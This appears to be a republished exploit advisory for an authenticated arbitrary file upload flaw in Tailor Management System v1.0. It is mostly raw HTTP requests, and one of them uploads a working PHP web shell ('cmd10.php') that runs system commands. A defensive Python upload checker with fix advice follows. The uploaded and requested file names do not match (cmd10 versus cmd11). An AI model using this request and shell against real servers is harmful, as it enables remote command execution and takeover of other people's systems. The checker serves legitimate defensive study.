Tailor Management System - Arbitrary File Upload (Authenticated)

2020.10.10
Credit: mosaaed
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Tailor Management System - Arbitrary File Upload (Authenticated)
# Google Dork: N/A
# Date: 2020-09-08
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: v1.0
# Tested on: Kali linux
# CVE: N/A

Step 1 - Request

POST /tailor/partedit.php?id=6 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------374227061277520034476021901
Content-Length: 943
DNT: 1
Connection: close
Referer: http://localhost/tailor/partedit.php?id=6
Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0
Upgrade-Insecure-Requests: 1

-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="type"

1
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="title"

HIPS
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="detail"

Take out all of the stuff in the front and back pockets your trouser. The hip measurement should be taken around the hips at the widest point. Stand up in a relaxed posture, and keep the tape parallel. Do not tighten the tape measure. Make sure you can move the tape easily.
-----------------------------374227061277520034476021901
Content-Disposition: form-data; name="bgimg"; filename="cmd10.php"
Content-Type: application/x-php

<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?>
-----------------------------374227061277520034476021901--

Step 2 - Response

GET /tailor/img/part/cmd11.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/tailor/partedit.php?id=6
Cookie: PHPSESSID=vrjbboto2c5v4tvhpssoiouvh0

Step 3 - Read file uploaded

http://localhost/tailor/img/part/cmd10.php
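A defensive check for the kind of request shown in Step 1, as an added example that is not part of the original advisory or the vendor's code: it parses a multipart/form-data body and reports file parts that an image-only field such as `bgimg` should refuse. The allowlist, the function name `inspect_upload` and the sample bodies are assumptions constructed for this illustration.

```python
import os
from email.parser import BytesParser

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}   # assumed image allowlist
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")

def inspect_upload(content_type, body):
    """Return (field, filename, reasons) for each file part that should be rejected."""
    # Prepend the request's Content-Type so the MIME parser can find the boundary.
    raw = b"Content-Type: " + content_type.encode("ascii") + b"\r\n\r\n" + body
    msg = BytesParser().parsebytes(raw)
    rejected = []
    parts = msg.get_payload() if msg.is_multipart() else []
    for part in parts:
        filename = part.get_filename()
        if filename is None:
            continue                               # ordinary form field, no file
        field = part.get_param("name", header="content-disposition")
        data = part.get_payload(decode=True) or b""
        reasons = []
        ext = os.path.splitext(filename)[1].lower()
        if ext not in ALLOWED_EXT:
            reasons.append("extension " + (ext or "(none)") + " not in allowlist")
        if not data.startswith(IMAGE_MAGIC):
            reasons.append("content does not start with an image signature")
        if b"<?php" in data.lower() or b"<?=" in data:
            reasons.append("PHP open tag in file content")
        if reasons:
            rejected.append((field, filename, reasons))
    return rejected

def _part(headers, value):
    return b"--" + BOUNDARY + b"\r\n" + headers + b"\r\n\r\n" + value + b"\r\n"

# Constructed sample bodies mirroring the shape of the request (not captured traffic).
BOUNDARY = b"constructed-boundary-0001"
CTYPE = "multipart/form-data; boundary=" + BOUNDARY.decode()
BAD_BODY = (
    _part(b'Content-Disposition: form-data; name="title"', b"HIPS")
    + _part(b'Content-Disposition: form-data; name="bgimg"; filename="cmd10.php"\r\n'
            b"Content-Type: application/x-php", b"<?php /* placeholder */ ?>")
    + b"--" + BOUNDARY + b"--\r\n")
GOOD_BODY = (
    _part(b'Content-Disposition: form-data; name="bgimg"; filename="hips.gif"\r\n'
          b"Content-Type: image/gif", b"GIF89a\x01\x00\x01\x00\x00")
    + b"--" + BOUNDARY + b"--\r\n")

if __name__ == "__main__":
    for field, name, reasons in inspect_upload(CTYPE, BAD_BODY):
        print(field, name, "; ".join(reasons))
```

Signature and tag checks are a detection layer only; the server-side fix is to enforce the extension allowlist, store uploads under a server-generated name, and serve the upload directory with script execution disabled.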



Copyright 2020, cxsecurity.com